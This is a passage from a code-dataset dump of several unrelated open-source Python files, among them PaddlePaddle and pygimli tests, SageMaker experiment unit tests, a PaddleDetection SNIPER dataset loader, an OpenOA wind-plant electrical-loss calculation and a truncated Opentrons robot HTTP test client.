seed = os.getpid()
np.random.seed(seed)
in_feat = 2
n_expert = 2
world_size = 2
tot_expert = n_expert * world_size
local_expert_count = np.random.randint(
1, 4, size=tot_expert
).astype("int")
fwd_expert_count = sum(local_expert_count)
local_input_buf = np.random.rand(fwd_expert_count, in_feat).astype(
"float32"
)
local_expert_count = paddle.to_tensor(local_expert_count)
local_input_buf = paddle.to_tensor(local_input_buf)
global_expert_count = []
paddle.distributed.alltoall(
paddle.split(local_expert_count, 2, axis=0), global_expert_count
)
global_expert_count = paddle.concat(global_expert_count, axis=0)
local_input_buf.stop_gradient = False
output = moe_utils.global_scatter(
local_input_buf, local_expert_count, global_expert_count
)
output.stop_gradient = False
c = output * output
c.backward()
return [output.numpy(False), local_input_buf.grad.numpy(False)]
if __name__ == "__main__":
runtime_main(TestCollectiveGlobalScatterAPI, "global_scatter")
|
8b8ebc78fecfe4775361b1d05d17ca840aed6bd2
|
543365e4c2f58970e7ad5a3c06dd23d20e0d134d
|
/pygimli/testing/test_Frameworks.py
|
ad39bfbc54a42750dc32ade97e56f9c6e8d4259e
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
gimli-org/gimli
|
152b5f1563e994385f7594a43482d467ee3cb9e7
|
0f55444b624f390a674053f62ba1a05506deafa6
|
refs/heads/master
| 2023-09-03T22:52:18.366328
| 2023-08-28T09:05:13
| 2023-08-28T09:05:13
| 12,602,199
| 307
| 125
|
NOASSERTION
| 2023-07-02T14:59:16
| 2013-09-04T21:10:47
|
C++
|
UTF-8
|
Python
| false
| false
| 1,740
|
py
|
test_Frameworks.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# write a correct test!
import unittest
import pygimli as pg
import numpy as np
class TestFrameworks(unittest.TestCase):
def test_Fit(self):
"""
"""
func = lambda x, a, b, c: a + b * x + c * x**2
x = np.linspace(0, 1, 11)
model = [1.5, 2, 2.5]
data = func(x, *model)
mEst, response = pg.frameworks.fit(func, data, x=x)
np.testing.assert_allclose(mEst, model)
np.testing.assert_allclose(data, response)
model = [0.5, -1.0, 0.0]
data = func(x, *model) #+ pg.randn(len(x))*0.001
mEst, response = pg.frameworks.fit(func, data, x=x)
# np.testing.assert_allclose(mEst, model, atol=1e-7)
# np.testing.assert_allclose(data, response)
# pg.plt.plot(x, data)
# pg.plt.plot(x, response, 'x')
print(model)
data[5] = 1e-17
#np.testing.assert_allclose(data2, data, atol=1e-15)
mEst, response = pg.frameworks.fit(func, data, x=x)
# np.testing.assert_allclose(mEst, model, atol=1e-8)
# np.testing.assert_allclose(data, response)
# pg.plt.plot(x, response, 'o')
# print(mEst)
# pg.wait()
func = lambda t, a, b: a*np.exp(b*t)
t = np.linspace(1, 2, 100)
data = func(t, 1.1, 2.2)
model, response = pg.frameworks.fit(func, data, t=t)
# pg.plt.plot(t, data, '.', label='data')
# pg.plt.plot(t, response, label='response')
# pg.wait()
np.testing.assert_allclose(model, [1.1, 2.2])
np.testing.assert_allclose(data, response)
if __name__ == '__main__':
#test = TestFrameworks()
#test.test_Fit()
unittest.main()
|
f9c70ff3509f1df70e30614d55811f9accc6c849
|
477b705bcf007707454a701f174103ba5292d0b4
|
/tests/unit/test_base_types.py
|
00cd808973ea2701d5a535e2ffe8a9799aa6f8ab
|
[
"Apache-2.0"
] |
permissive
|
aws/sagemaker-experiments
|
357baeca25fa869545604cbb11d41f3afe3ddc29
|
815bf0c8111d06115040d839f6f1f57831c16bc6
|
refs/heads/main
| 2023-08-15T10:34:58.407886
| 2023-05-17T14:59:01
| 2023-05-17T15:58:34
| 215,120,058
| 110
| 34
|
Apache-2.0
| 2023-05-17T15:58:36
| 2019-10-14T18:43:20
|
Python
|
UTF-8
|
Python
| false
| false
| 5,442
|
py
|
test_base_types.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import pytest
import unittest.mock
from smexperiments import _base_types
@pytest.fixture
def sagemaker_boto_client():
return unittest.mock.Mock()
def test_from_boto():
obj = _base_types.ApiObject.from_boto(dict(A=10))
assert obj.a == 10
def test_to_boto():
assert dict(A=10) == _base_types.ApiObject.to_boto({"a": 10})
def test_custom_type():
class TestTypeA(_base_types.ApiObject):
pass
class TestTypeB(_base_types.ApiObject):
_custom_boto_types = {"test_type_a_value": (TestTypeA, False)}
obj = TestTypeB.from_boto(dict(TestTypeAValue=dict(SomeValue=10)))
assert obj.test_type_a_value == TestTypeA(some_value=10)
obj2 = TestTypeB(test_type_a_value=TestTypeA(some_value=10))
assert TestTypeB.to_boto(vars(obj2)) == dict(TestTypeAValue=dict(SomeValue=10))
def test_custom_type_list():
class TestTypeA(_base_types.ApiObject):
pass
class TestTypeB(_base_types.ApiObject):
_custom_boto_types = {"test_type_a_value": (TestTypeA, True)}
obj = TestTypeB.from_boto(dict(TestTypeAValue=[dict(SomeValue=10), dict(SomeValue=11)]))
assert obj.test_type_a_value == [TestTypeA(some_value=10), TestTypeA(some_value=11)]
assert dict(TestTypeAValue=[dict(SomeValue=10), dict(SomeValue=11)]) == TestTypeB.to_boto(vars(obj))
class DummyRecordSummary(_base_types.ApiObject):
pass
class DummyRecord(_base_types.Record):
_boto_create_method = "create"
_boto_update_method = "update"
_boto_delete_method = "delete"
_boto_update_members = ["a"]
_boto_delete_members = ["a", "b"]
def update(self):
"""Placeholder docstring"""
return self._invoke_api(self._boto_update_method, self._boto_update_members)
def delete(self):
"""Placeholder docstring"""
self._invoke_api(self._boto_delete_method, self._boto_delete_members)
def test_custom_type_dict():
class TestTypeA(_base_types.ApiObject):
pass
class TestTypeB(_base_types.ApiObject):
_custom_boto_types = {"test_type_a_value": (TestTypeA, True)}
obj = TestTypeB.from_boto(dict(TestTypeAValue={"key_1": dict(SomeValue=10), "key_2": dict(SomeValue=11)}))
assert obj.test_type_a_value == {
"key_1": TestTypeA(some_value=10),
"key_2": TestTypeA(some_value=11),
}
assert dict(TestTypeAValue={"key_1": dict(SomeValue=10), "key_2": dict(SomeValue=11)}) == TestTypeB.to_boto(
vars(obj)
)
def test_construct(sagemaker_boto_client):
sagemaker_boto_client.create.return_value = dict(C=20)
record = DummyRecord._construct(DummyRecord._boto_create_method, sagemaker_boto_client, a=10, b=10)
assert record.a == 10
assert record.b == 10
assert record.c == 20
def test_update(sagemaker_boto_client):
sagemaker_boto_client.update.return_value = {}
record = DummyRecord(sagemaker_boto_client, a=10, b=10)
record.update()
sagemaker_boto_client.update.assert_called_with(A=10)
def test_delete(sagemaker_boto_client):
sagemaker_boto_client.delete.return_value = {}
record = DummyRecord(sagemaker_boto_client, a=10, b=10)
record.delete()
sagemaker_boto_client.delete.assert_called_with(A=10, B=10)
def test_list_empty(sagemaker_boto_client):
sagemaker_boto_client.list.return_value = {"TestRecordSummaries": []}
assert [] == list(
DummyRecord._list(
"list",
DummyRecordSummary.from_boto,
"TestRecordSummaries",
sagemaker_boto_client=sagemaker_boto_client,
)
)
def test_list_with_items(sagemaker_boto_client):
sagemaker_boto_client.list.return_value = {"TestRecordSummaries": [{"Foo": "bar"}]}
assert [DummyRecordSummary(foo="bar")] == list(
DummyRecord._list(
"list",
DummyRecordSummary.from_boto,
"TestRecordSummaries",
sagemaker_boto_client=sagemaker_boto_client,
)
)
def test_list_with_next_token(sagemaker_boto_client):
sagemaker_boto_client.list.side_effect = [
{"TestRecordSummaries": [{"A": 1}, {"A": 2}], "NextToken": "a"},
{"TestRecordSummaries": [{"A": 3}, {"A": 4}], "NextToken": None},
]
assert [DummyRecordSummary(a=i) for i in range(1, 5)] == list(
DummyRecord._list(
"list",
DummyRecordSummary.from_boto,
"TestRecordSummaries",
sagemaker_boto_client=sagemaker_boto_client,
)
)
@unittest.mock.patch("smexperiments._base_types._utils.sagemaker_client")
def test_list_no_client(mocked_utils_sagemaker_client, sagemaker_boto_client):
mocked_utils_sagemaker_client.return_value = sagemaker_boto_client
sagemaker_boto_client.list.side_effect = []
list(DummyRecord._list("list", DummyRecordSummary.from_boto, "TestRecordSummaries"))
assert _base_types._utils.sagemaker_client.called
|
d97fe6084db141b21d7814d233a75505c3845ccb
|
c6759b857e55991fea3ef0b465dbcee53fa38714
|
/tools/nntool/nntool/generation/generators/general/expressions.py
|
4561ca0df2616713c2981247aaeb5275cbe82704
|
[
"AGPL-3.0-or-later",
"AGPL-3.0-only",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"Apache-2.0"
] |
permissive
|
GreenWaves-Technologies/gap_sdk
|
1b343bba97b7a5ce62a24162bd72eef5cc67e269
|
3fea306d52ee33f923f2423c5a75d9eb1c07e904
|
refs/heads/master
| 2023-09-01T14:38:34.270427
| 2023-08-10T09:04:44
| 2023-08-10T09:04:44
| 133,324,605
| 145
| 96
|
Apache-2.0
| 2023-08-27T19:03:52
| 2018-05-14T07:50:29
|
C
|
UTF-8
|
Python
| false
| false
| 2,258
|
py
|
expressions.py
|
# Copyright (C) 2020 GreenWaves Technologies, SAS
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import logging
from nntool.generation.generators.general.autotiler_kernel import NewAutoTilerKernel
from nntool.generation.generators.generator_base import GeneratorBase, paramstype
from nntool.generation.generators.helpers.in_out_bindings_mixin import \
InOutBindingsMixin
from nntool.graph.types import ExpressionFusionNode
LOG = logging.getLogger(__name__)
@paramstype(ExpressionFusionNode)
class GenExpressionParameters(GeneratorBase, InOutBindingsMixin):
@classmethod
def globals_generator(cls, gen, node, qrec, pnode, fnode) -> bool:
return True
@classmethod
def bindings_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
cls.set_multi_in_out_bindings(
gen, in_eparams, out_eparams, cname, node, qrec)
return True
@classmethod
def kernel_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
del in_eparams, out_eparams
func_name, _ = gen.expressions_get_names(node)
gen_name = f'{func_name}_gen'
gen.kernels.append(ExpressionKernel(cname, node, qrec, gen_name))
return True
class ExpressionKernel(NewAutoTilerKernel):
CALL_TEMPLATE = '''
// generator for {node_name}
{gen_name}("{cname}");
'''
def __init__(self, cname, params, qrec, gen_name):
attrs = {
'gen_name': gen_name
}
# other attributes
extra_attrs = {
'cname': cname,
'node_name': params.name
}
super().__init__(attrs, extra_attrs,)
|
002d61d9a517a60c5a3d3c40bcbc862f4f59b6aa
|
0841643267b9fc1478f6e3d21bfccb17aba67af6
|
/gs_quant/test/utils/datagrid_test_utils.py
|
5afb5db96e8838bbe3bb179e8750011ae5e63781
|
[
"Apache-2.0"
] |
permissive
|
goldmansachs/gs-quant
|
55618e0e4e961d4ee50b7393f27c258e2647a957
|
4cf8ec75c4d85b16ec08371c46cc1a9ede9d72a2
|
refs/heads/master
| 2023-08-20T00:55:43.324547
| 2023-08-16T16:55:22
| 2023-08-16T16:55:22
| 161,840,815
| 2,088
| 596
|
Apache-2.0
| 2023-08-16T16:55:23
| 2018-12-14T21:10:40
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,056
|
py
|
datagrid_test_utils.py
|
"""
Copyright 2019 Goldman Sachs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import json
import pathlib
from gs_quant.markets.securities import Stock
from gs_quant.target.common import Currency
def _read_entity(entity):
with open(pathlib.Path(__file__).parents[1] / f'resources/{entity}.json') as entity:
return json.loads(entity.read())
def get_test_entity(entity_id: str):
entity = _read_entity(entity_id)
return Stock(id_=entity_id,
name=entity['name'],
currency=Currency.USD,
entity=entity)
|
2b8782aac602ecd7304e385db02bf5f0d8e74407
|
bf8d344b17e2ff9b7e38ad9597d5ce0e3d4da062
|
/ppdet/data/source/sniper_coco.py
|
1b07e7a31d999d137965c4860a4d8085d0b91465
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleDetection
|
e7e0f40bef75a4e0b6dcbacfafa7eb1969e44961
|
bd83b98342b0a6bc8d8dcd5936233aeda1e32167
|
refs/heads/release/2.6
| 2023-08-31T07:04:15.357051
| 2023-08-18T02:24:45
| 2023-08-18T02:24:45
| 217,475,193
| 12,523
| 3,096
|
Apache-2.0
| 2023-09-10T10:05:56
| 2019-10-25T07:21:14
|
Python
|
UTF-8
|
Python
| false
| false
| 6,837
|
py
|
sniper_coco.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import cv2
import json
import copy
import numpy as np
try:
from collections.abc import Sequence
except Exception:
from collections import Sequence
from ppdet.core.workspace import register, serializable
from ppdet.data.crop_utils.annotation_cropper import AnnoCropper
from .coco import COCODataSet
from .dataset import _make_dataset, _is_valid_file
from ppdet.utils.logger import setup_logger
logger = setup_logger('sniper_coco_dataset')
@register
@serializable
class SniperCOCODataSet(COCODataSet):
"""SniperCOCODataSet"""
def __init__(self,
dataset_dir=None,
image_dir=None,
anno_path=None,
proposals_file=None,
data_fields=['image'],
sample_num=-1,
load_crowd=False,
allow_empty=True,
empty_ratio=1.,
is_trainset=True,
image_target_sizes=[2000, 1000],
valid_box_ratio_ranges=[[-1, 0.1],[0.08, -1]],
chip_target_size=500,
chip_target_stride=200,
use_neg_chip=False,
max_neg_num_per_im=8,
max_per_img=-1,
nms_thresh=0.5):
super(SniperCOCODataSet, self).__init__(
dataset_dir=dataset_dir,
image_dir=image_dir,
anno_path=anno_path,
data_fields=data_fields,
sample_num=sample_num,
load_crowd=load_crowd,
allow_empty=allow_empty,
empty_ratio=empty_ratio
)
self.proposals_file = proposals_file
self.proposals = None
self.anno_cropper = None
self.is_trainset = is_trainset
self.image_target_sizes = image_target_sizes
self.valid_box_ratio_ranges = valid_box_ratio_ranges
self.chip_target_size = chip_target_size
self.chip_target_stride = chip_target_stride
self.use_neg_chip = use_neg_chip
self.max_neg_num_per_im = max_neg_num_per_im
self.max_per_img = max_per_img
self.nms_thresh = nms_thresh
def parse_dataset(self):
if not hasattr(self, "roidbs"):
super(SniperCOCODataSet, self).parse_dataset()
if self.is_trainset:
self._parse_proposals()
self._merge_anno_proposals()
self.ori_roidbs = copy.deepcopy(self.roidbs)
self.init_anno_cropper()
self.roidbs = self.generate_chips_roidbs(self.roidbs, self.is_trainset)
def set_proposals_file(self, file_path):
self.proposals_file = file_path
def init_anno_cropper(self):
logger.info("Init AnnoCropper...")
self.anno_cropper = AnnoCropper(
image_target_sizes=self.image_target_sizes,
valid_box_ratio_ranges=self.valid_box_ratio_ranges,
chip_target_size=self.chip_target_size,
chip_target_stride=self.chip_target_stride,
use_neg_chip=self.use_neg_chip,
max_neg_num_per_im=self.max_neg_num_per_im,
max_per_img=self.max_per_img,
nms_thresh=self.nms_thresh
)
def generate_chips_roidbs(self, roidbs, is_trainset):
if is_trainset:
roidbs = self.anno_cropper.crop_anno_records(roidbs)
else:
roidbs = self.anno_cropper.crop_infer_anno_records(roidbs)
return roidbs
def _parse_proposals(self):
if self.proposals_file:
self.proposals = {}
logger.info("Parse proposals file:{}".format(self.proposals_file))
with open(self.proposals_file, 'r') as f:
proposals = json.load(f)
for prop in proposals:
image_id = prop["image_id"]
if image_id not in self.proposals:
self.proposals[image_id] = []
x, y, w, h = prop["bbox"]
self.proposals[image_id].append([x, y, x + w, y + h])
def _merge_anno_proposals(self):
assert self.roidbs
if self.proposals and len(self.proposals.keys()) > 0:
logger.info("merge proposals to annos")
for id, record in enumerate(self.roidbs):
image_id = int(record["im_id"])
if image_id not in self.proposals.keys():
logger.info("image id :{} no proposals".format(image_id))
record["proposals"] = np.array(self.proposals.get(image_id, []), dtype=np.float32)
self.roidbs[id] = record
def get_ori_roidbs(self):
if not hasattr(self, "ori_roidbs"):
return None
return self.ori_roidbs
def get_roidbs(self):
if not hasattr(self, "roidbs"):
self.parse_dataset()
return self.roidbs
def set_roidbs(self, roidbs):
self.roidbs = roidbs
def check_or_download_dataset(self):
return
def _parse(self):
image_dir = self.image_dir
if not isinstance(image_dir, Sequence):
image_dir = [image_dir]
images = []
for im_dir in image_dir:
if os.path.isdir(im_dir):
im_dir = os.path.join(self.dataset_dir, im_dir)
images.extend(_make_dataset(im_dir))
elif os.path.isfile(im_dir) and _is_valid_file(im_dir):
images.append(im_dir)
return images
def _load_images(self):
images = self._parse()
ct = 0
records = []
for image in images:
assert image != '' and os.path.isfile(image), \
"Image {} not found".format(image)
if self.sample_num > 0 and ct >= self.sample_num:
break
im = cv2.imread(image)
h, w, c = im.shape
rec = {'im_id': np.array([ct]), 'im_file': image, "h": h, "w": w}
self._imid2path[ct] = image
ct += 1
records.append(rec)
assert len(records) > 0, "No image file found"
return records
def get_imid2path(self):
return self._imid2path
def set_images(self, images):
self._imid2path = {}
self.image_dir = images
self.roidbs = self._load_images()
|
ab83aad2618602de99620d4f94e49500e805d05f
|
8f2c55a2530c3e59dab5907c0044c618b88dd09b
|
/tests_python/resources/_debugger_case_smart_step_into3.py
|
1215d125c419bbc7064eb8af0b1eaf6e71da77eb
|
[
"Apache-2.0",
"EPL-1.0"
] |
permissive
|
fabioz/PyDev.Debugger
|
5a9c6d4c09be85a0e2d9fb93567fd65faf04c81d
|
26864816cbfcf002a99913bcc31ebef48042a4ac
|
refs/heads/main
| 2023-08-18T01:08:34.323363
| 2023-04-15T11:15:47
| 2023-04-15T11:15:47
| 21,870,144
| 363
| 126
|
Apache-2.0
| 2023-07-30T23:03:31
| 2014-07-15T18:01:12
|
Python
|
UTF-8
|
Python
| false
| false
| 347
|
py
|
_debugger_case_smart_step_into3.py
|
def foo(arg):
print('on foo mark', arg)
return arg + 1
def main():
items = [1] # break here
gen = (foo(arg) for arg in items)
list(gen)
# import dis
# print('-------- main ------------')
# dis.dis(main)
# print('-------- foo ------------')
# dis.dis(foo)
if __name__ == '__main__':
main()
print('TEST SUCEEDED')
|
e87844c3956177e315d65d64bbb255a7545c4911
|
0acf9e2cfae0ff6468ddf42fc130c29b90999194
|
/operational_analysis/methods/electrical_losses.py
|
c06f912ced8d89beaa097be6b10d238520ee9122
|
[
"BSD-3-Clause"
] |
permissive
|
NREL/OpenOA
|
02c6dc0300f2230f6506b6672fa9284af8010114
|
a7c89bbaed8fb19e9780088f84ce1443c1567b2a
|
refs/heads/main
| 2023-09-04T23:30:29.941733
| 2023-07-25T17:22:53
| 2023-07-25T17:22:53
| 77,166,290
| 160
| 56
|
BSD-3-Clause
| 2023-09-02T00:17:45
| 2016-12-22T18:16:30
|
Python
|
UTF-8
|
Python
| false
| false
| 12,045
|
py
|
electrical_losses.py
|
# This class defines key analytical routines for calculating electrical losses for
# a wind plant using operational data. Electrical loss is calculated per month and on
# an average annual basis by comparing monthly energy production from the turbines
# and the revenue meter
import numpy as np
import pandas as pd
from tqdm import tqdm
from operational_analysis import logging, logged_method_call
logger = logging.getLogger(__name__)
class ElectricalLosses(object):
"""
A serial (Pandas-driven) implementation of calculating the average monthly and annual
electrical losses at a wind plant, and their uncertainty.
Energy output from the turbine SCADA meter and the wind plant revenue
meter are used to estimate electrical losses.
The approach is to first calculate daily sums of turbine and revenue meter energy over the
plant period of record. Only those days where all turbines and the revenue meter were
reporting for all timesteps are considered. Electrical loss is then the difference in
total turbine energy production and meter production over those concurrent days.
A Monte Carlo approach is applied to sample revenue meter data and SCADA data
with a 0.5% imposed uncertainty, and one filtering parameter is sampled too.
The uncertainty in estimated electrical losses is quantified as standard deviation
of the distribution of losses obtained from the MC sampling.
In the case that meter data is not provided on a daily or sub-daily basis (e.g. monthly), a
different approach is implemented. The sum of daily turbine energy is corrected for any missing
reported energy data from the turbines based on the ratio of expected number of data counts per day
to the actual. Daily corrected sum of turbine energy is then summed on a monthly basis. Electrical
loss is then the difference between total corrected turbine energy production and meter production
over those concurrent months.
"""
@logged_method_call
def __init__(self, plant, UQ=False, num_sim=20000):
"""
Initialize electrical losses class with input parameters
Args:
plant(:obj:`PlantData object`): PlantData object from which EYAGapAnalysis should draw data.
num_sim:(:obj:`int`): number of Monte Carlo simulations
UQ:(:obj:`bool`): choice whether to perform (True) or not (False) uncertainty quantification
"""
logger.info("Initializing Electrical Losses Object")
# Check that selected UQ is allowed
if UQ:
logger.info("Note: uncertainty quantification will be performed in the calculation")
self.num_sim = num_sim
elif not UQ:
logger.info("Note: uncertainty quantification will NOT be performed in the calculation")
self.num_sim = 1
else:
raise ValueError(
"UQ has to either be True (uncertainty quantification performed, default) or False (uncertainty quantification NOT performed)"
)
self.UQ = UQ
self._plant = plant
self._min_per_hour = 60 # Mintues per hour converter
self._hours_per_day = 24 # Hours per day converter
@logged_method_call
def run(
self, uncertainty_meter=0.005, uncertainty_scada=0.005, uncertainty_correction_thresh=0.95
):
"""
Run the electrical loss calculation in order by calling this function.
Args:
uncertainty_meter(:obj:`float`): uncertainty imposed to revenue meter data (for UQ = True case)
uncertainty_scada(:obj:`float`): uncertainty imposed to scada data (for UQ = True case)
uncertainty_correction_thresh(:obj:`tuple`): Data availability thresholds (fractions)
under which months should be eliminated.
This should be a tuple in the UQ = True case,
a single value when UQ = False.
Returns:
(None)
"""
# Define uncertainties and check types
expected_type = float if not self.UQ else tuple
assert (
type(uncertainty_correction_thresh) == expected_type
), f"uncertainty_correction_thresh must be {expected_type} for UQ={self.UQ}"
self.uncertainty_correction_thresh = np.array(
uncertainty_correction_thresh, dtype=np.float64
)
if self.UQ:
self.uncertainty_meter = uncertainty_meter
self.uncertainty_scada = uncertainty_scada
# Process SCADA data to daily sums
self.process_scada()
# Process meter data to daily sums (if time frequency is less than monthly)
self._monthly_meter = True # Keep track of reported meter data frequency
if (
(self._plant._meter_freq != "MS")
& (self._plant._meter_freq != "M")
& (self._plant._meter_freq != "1MS")
):
self.process_meter()
self._monthly_meter = False # Set to false if sub-monthly frequency
# Setup Monte Carlo approach
self.setup_inputs()
# Calculate electrical losses, Monte Carlo approach
self.calculate_electrical_losses()
def setup_inputs(self):
"""
Create and populate the data frame defining the simulation parameters.
This data frame is stored as self._inputs
Args:
(None)
Returns:
(None)
"""
if self.UQ:
inputs = {
"meter_data_fraction": np.random.normal(1, self.uncertainty_meter, self.num_sim),
"scada_data_fraction": np.random.normal(1, self.uncertainty_scada, self.num_sim),
"correction_threshold": np.random.randint(
self.uncertainty_correction_thresh[0] * 1000,
self.uncertainty_correction_thresh[1] * 1000,
self.num_sim,
)
/ 1000.0,
}
self._inputs = pd.DataFrame(inputs)
if not self.UQ:
inputs = {
"meter_data_fraction": 1,
"scada_data_fraction": 1,
"correction_threshold": self.uncertainty_correction_thresh,
}
self._inputs = pd.DataFrame(inputs, index=[0])
self._electrical_losses = np.empty([self.num_sim, 1])
@logged_method_call
def process_scada(self):
"""
Calculate daily sum of turbine energy only for days when all turbines are reporting
at all time steps.
Args:
(None)
Returns:
(None)
"""
logger.info("Processing SCADA data")
scada_df = self._plant._scada.df
# Sum up SCADA data power and energy and count number of entries
scada_sum = scada_df.groupby(scada_df.index)[["energy_kwh"]].sum()
scada_sum["count"] = scada_df.groupby(scada_df.index)[["energy_kwh"]].count()
self._scada_sum = scada_sum
# Calculate daily sum of all turbine energy production and count number of entries
self._scada_daily = scada_sum.resample("D")["energy_kwh"].sum().to_frame()
self._scada_daily.columns = ["turbine_energy_kwh"]
self._scada_daily["count"] = scada_sum.resample("D")["count"].sum()
# Specify expected count provided all turbines reporting
expected_count = (
self._hours_per_day
* self._min_per_hour
/ (pd.to_timedelta(self._plant._scada_freq).total_seconds() / 60)
* self._plant._num_turbines
)
# Correct sum of turbine energy for cases with missing reported data
self._scada_daily["corrected_energy"] = (
self._scada_daily["turbine_energy_kwh"] * expected_count / self._scada_daily["count"]
)
self._scada_daily["perc"] = self._scada_daily["count"] / expected_count
# Store daily SCADA data where all turbines reporting for every time step during the day
self._scada_sub = self._scada_daily[self._scada_daily["count"] == expected_count]
@logged_method_call
def process_meter(self):
"""
Calculate daily sum of meter energy only for days when meter data is reporting at all time steps.
Args:
(None)
Returns:
(None)
"""
logger.info("Processing meter data")
meter_df = self._plant._meter.df
# Sum up meter data to daily
self._meter_daily = meter_df.resample("D").sum()
self._meter_daily["mcount"] = meter_df.resample("D")["energy_kwh"].count()
# Specify expected count provided all timestamps reporting
expected_mcount = (
self._hours_per_day
* self._min_per_hour
/ (pd.to_timedelta(self._plant._meter_freq).total_seconds() / 60)
)
# Keep only data with all turbines reporting for every time step during the day
self._meter_daily = self._meter_daily[self._meter_daily["mcount"] == expected_mcount]
@logged_method_call
def calculate_electrical_losses(self):
"""
Apply Monte Carlo approach to calculate electrical losses and their
uncertainty based on the difference in the sum of turbine and metered
energy over the compiled days.
Args:
(None)
Returns:
(None)
"""
logger.info("Calculating electrical losses")
# Loop through number of simulations, calculate losses each time, store results
for n in tqdm(np.arange(self.num_sim)):
self._run = self._inputs.loc[n]
meter_df = self._plant._meter.df
# If monthly meter data, sum the corrected daily turbine energy to monthly and merge with meter
if self._monthly_meter:
scada_monthly = (
self._scada_daily.resample("MS")["corrected_energy"].sum().to_frame()
)
scada_monthly.columns = ["turbine_energy_kwh"]
# Determine availability for each month represented
scada_monthly["count"] = self._scada_sum.resample("MS")["count"].sum()
scada_monthly["expected_count_monthly"] = (
scada_monthly.index.daysinmonth
* self._hours_per_day
* self._min_per_hour
/ (pd.to_timedelta(self._plant._scada_freq).total_seconds() / 60)
* self._plant._num_turbines
)
scada_monthly["perc"] = (
scada_monthly["count"] / scada_monthly["expected_count_monthly"]
)
# Filter out months in which there was less than x% of total running (all turbines at all timesteps)
scada_monthly = scada_monthly.loc[
scada_monthly["perc"] >= self._run.correction_threshold, :
]
merge_df = meter_df.join(scada_monthly)
# If sub-monthly meter data, merge the daily data for which all turbines are reporting at all timestamps
else:
# Note 'self._scada_sub' only contains full reported data
merge_df = self._meter_daily.join(self._scada_sub)
# Drop non-concurrent timestamps and get total sums over concurrent period of record
merge_df.dropna(inplace=True)
self._merge_df = merge_df
merge_sum = merge_df.sum(axis=0)
# Calculate electrical loss from difference of sum of turbine and meter energy
self._total_turbine_energy = (
merge_sum["turbine_energy_kwh"] * self._run.scada_data_fraction
)
self._total_meter_energy = merge_sum["energy_kwh"] * self._run.meter_data_fraction
self._electrical_losses[n] = 1 - self._total_meter_energy / self._total_turbine_energy
|
c1b04d807381b016121e2329b838fcb3852ddabf
|
6fdb4eaf5b0e6dbd7db4bf947547541e9aebf110
|
/robot-server/tests/integration/robot_client.py
|
23c13bca7c3305609a11e2837a8f4405d5ef4a6c
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
Opentrons/opentrons
|
874321e01149184960eeaeaa31b1d21719a1ceda
|
026b523c8c9e5d45910c490efb89194d72595be9
|
refs/heads/edge
| 2023-09-02T02:51:49.579906
| 2023-08-31T16:02:45
| 2023-08-31T16:02:45
| 38,644,841
| 326
| 174
|
Apache-2.0
| 2023-09-14T21:47:20
| 2015-07-06T20:41:01
|
Python
|
UTF-8
|
Python
| false
| false
| 10,027
|
py
|
robot_client.py
|
from __future__ import annotations
import asyncio
import concurrent.futures
import contextlib
from pathlib import Path
from typing import Any, AsyncGenerator, BinaryIO, Dict, List, Optional, Tuple, Union
import httpx
from httpx import Response
STARTUP_WAIT = 20
SHUTDOWN_WAIT = 20
class RobotClient:
"""Client for the robot's HTTP API.
This is mostly a thin wrapper, where most methods have a 1:1 correspondence
with HTTP endpoints. See the robot server's OpenAPI specification for
details on semantics and request/response shapes.
"""
def __init__(
self,
httpx_client: httpx.AsyncClient,
worker_executor: concurrent.futures.ThreadPoolExecutor,
base_url: str,
) -> None:
"""Initialize the client."""
self.httpx_client = httpx_client
self.worker_executor = worker_executor
self.base_url = base_url
@staticmethod
@contextlib.asynccontextmanager
async def make(base_url: str, version: str) -> AsyncGenerator[RobotClient, None]:
with concurrent.futures.ThreadPoolExecutor() as worker_executor:
async with httpx.AsyncClient(
headers={"opentrons-version": version},
# Set the default timeout high enough for our heaviest requests
# (like fetching a large protocol analysis) to fit comfortably.
# If an individual test wants to shorten this timeout, it should wrap
# its request in anyio.fail_after().
timeout=30,
) as httpx_client:
yield RobotClient(
httpx_client=httpx_client,
worker_executor=worker_executor,
base_url=base_url,
)
async def alive(self) -> bool:
"""Is /health reachable?"""
try:
await self.get_health()
return True
except (httpx.ConnectError, httpx.HTTPStatusError):
return False
async def dead(self) -> bool:
"""Is /health unreachable?"""
try:
await self.get_health()
return False
except httpx.HTTPStatusError:
return False
except httpx.ConnectError:
pass
return True
async def _poll_for_alive(self) -> None:
